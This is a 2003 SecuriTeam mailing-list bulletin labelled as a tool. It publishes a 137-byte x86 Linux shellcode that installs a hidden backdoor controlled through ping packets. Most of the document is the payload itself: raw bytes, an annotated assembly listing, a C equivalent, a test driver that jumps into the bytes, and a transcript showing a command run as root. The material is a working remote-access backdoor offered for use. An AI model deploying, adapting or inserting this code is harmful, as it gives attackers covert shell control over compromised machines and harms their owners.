[TOOL] Linux ICMP Based Shellcode
From: support@securiteam.com
Date: 02/05/03
From: support@securiteam.com To: list@securiteam.com Date: 5 Feb 2003 20:03:28 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Linux ICMP Based Shellcode
------------------------------------------------------------------------
DETAILS
The following is a 137-byte Linux shellcode that creates a remote ICMP
backdoor that can be controlled through the ping utility.
Shellcode:
/*
x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
[example]
main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
Size of shellcode = 137
main:/home/gloomy/security/shellcode/linux/icmp# ping -p
992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
main:/home/gloomy/security/shellcode/linux/icmp# cat out
uid=0(root) gid=0(root) groups=0(root)
main:/home/gloomy/security/shellcode/linux/icmp#
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SECRET_CHAR "\x99"
/*
 * The 137 raw bytes that main() jumps into. asm_code() below is the same
 * program in readable AT&T syntax and is the easier form to audit; the two
 * are kept in step by hand (the SECRET_CHAR splice on the 9th line is the
 * `movb $0x99,%al` in the listing). The trailing "/bin/sh -c" text is part
 * of the payload: at run time a NUL is written over the space so it yields
 * the two argv strings "/bin/sh" and "-c".
 */
char shell[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
"\x43\x41\x51\xb1\x03\x51\x49\x51"
"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
"\xcd\x80\x31\xdb\x39\xc3\x75\x55"
"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
"\xff\x54\x54\x53\x50\x55\x52\x89"
"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
"\xb0\x25\x01\xc5\xb0" SECRET_CHAR
"\x32\x45\xff\x75\xd5\xb0\x02\xcd"
"\x80\x31\xdb\x39\xc3\x74\x25\xeb"
"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
"\x06\xcd\x80\x5b\x89\xd9\x88\x43"
"\x07\x80\xc1\x08\x50\x55\x51\x53"
"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
"\xff"
"/bin/sh -c";
/*
 * Readable (i386, AT&T syntax) form of the bytes in shell[]. The labels
 * correspond to the relative jumps in the byte string. What the listing does,
 * in order:
 *   - socketcall(SYS_SOCKET, {2, 3, 1}): an AF_INET / SOCK_RAW / IPPROTO_ICMP
 *     socket, so every ICMP datagram arrives with its IP header included.
 *   - fork(): the parent takes the `exit` path; the child enters `endlessloop`.
 *   - socketcall(SYS_RECVFROM) with the buffer at %ebp and length 0xff, then a
 *     NUL is stored near the end of what was received.
 *   - %ebp is advanced by 0x25 and the byte at -1(%ebp), i.e. offset 36 of the
 *     datagram, is XORed with 0x99 (SECRET_CHAR); a mismatch loops back.
 *   - on a match fork() again; the child jumps to `stack`, whose `call execve`
 *     pushes the address of "/bin/sh -c" as a return address.
 *   - `execve`: close(2); the popped string address gets a NUL at +7 (al holds
 *     close()'s return, 0 on success) splitting it into "/bin/sh" and "-c";
 *     argv = {"/bin/sh", "-c", <datagram text from offset 37>, NULL}, envp = NULL
 *     (cdq zero-extends the small positive eax into edx); execve.
 * NOTE(review): %ebp is never initialised here, so the receive buffer is
 * wherever the caller's frame pointer points. Offset 36 is presumably the
 * 20-byte IPv4 header + 8-byte ICMP header + ping's 8-byte timestamp prefix,
 * which is why the example in the header uses `ping -p` -- confirm against the
 * ping build used in the transcript.
 * Host-side artifacts this code produces: a raw ICMP socket held by a forked,
 * detached process, a further fork per matching datagram, and /bin/sh started
 * with stderr closed.
 */
void asm_code() {
/* The string below is passed verbatim to the assembler; it is not compiled as C. */
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
movb $0x66,%al
incl %ebx
incl %ecx
push %ecx
movb $0x3,%cl
push %ecx
decl %ecx
push %ecx
movl %esp,%ecx
int $0x80 /* socket(); */
movl %eax,%edx
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
jne exit
endlessloop:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x10,%al
push %eax
movb $0xff,%al
push %esp
push %esp
push %ebx
push %eax
push %ebp
push %edx
movl %esp,%ecx
movb $0x66,%al
movb $0x0c,%bl
int $0x80 /* recvfrom(); */
movl %ebp,%ecx
addl %eax,%ecx
xorl %eax,%eax
movb %al,-2(%ecx)
movb $0x25,%al
addl %eax,%ebp
movb $0x99,%al /* SECRET_CHAR */
xorb -1(%ebp),%al
jnz endlessloop
movb $0x2,%al
int $0x80 /* fork(); */
xorl %ebx,%ebx
cmpl %eax,%ebx
je stack
jmp endlessloop
execve:
xorl %eax,%eax
xorl %ebx,%ebx
movb $0x2,%bl
movb $0x6,%al
int $0x80 /* close(); */
pop %ebx
movl %ebx,%ecx
movb %al,0x7(%ebx)
addb $0x8,%cl
push %eax
push %ebp
push %ecx
push %ebx
movl %esp,%ecx
cdq
movb $0xb,%al
int $0x80 /* execve(); */
exit:
xorl %eax,%eax
incl %eax
int $0x80 /* exit(); */
stack:
call execve
.string \"/bin/sh -c\"
");
}
/*
 * Plain-C reference for the behaviour of shell[]/asm_code(), written for
 * reading rather than for use: a raw ICMP socket, a fork to detach, then a
 * receive loop that treats byte 36 of each datagram as the trigger and the
 * text from byte 37 as a command for `/bin/sh -c`.
 * NOTE(review): SECRET_CHAR expands to the string literal "\x99", so the
 * comparison below casts a char * to char rather than testing for the 0x99
 * byte; the assembler version compares the byte directly.
 */
void c_code() {
int fd;
int nb = 0;                                  /* byte count returned by recvfrom() */
struct sockaddr_in them;
int them_size = sizeof(struct sockaddr);     /* recvfrom() expects socklen_t *; an int * is passed */
char buf[256];
char *prog[] = {"/bin/sh","-c",&buf[37],NULL}; /* argv; the command text starts right after the trigger byte */
fd = socket(2,3,1);                          /* AF_INET, SOCK_RAW, IPPROTO_ICMP: IP header is included in buf */
if (fork() > 0) exit(0);                     /* parent exits; the child keeps running detached */
while (1) {
while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr
*)&them,&them_size)));
buf[nb-1] = 0;                               /* overwrite the last received byte so the command is a C string */
if (buf[36] == (char)SECRET_CHAR)
if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }  /* stderr closed before the shell starts */
}
}
/*
 * Test driver: reports the payload length (the "Size of shellcode = 137" line
 * in the transcript above), then casts the shell[] byte array to a function
 * pointer and jumps into it. That only works where the data segment is
 * executable -- presumably true on the 2003-era toolchain used; confirm.
 * strlen() is called without <string.h> and printed with %d, which relies on
 * an implicit declaration and a size_t/int mismatch; left as in the original.
 */
int main(int c,char *v[]) {
void (*i)();                                 /* function pointer aliasing the byte array */
i = (void (*)())shell;
fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
i();                                         /* control does not normally return from the payload */
return 0;
}
ADDITIONAL INFORMATION
The shellcode has been provided by <mailto:gloomy@netric.org> Gloomy.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.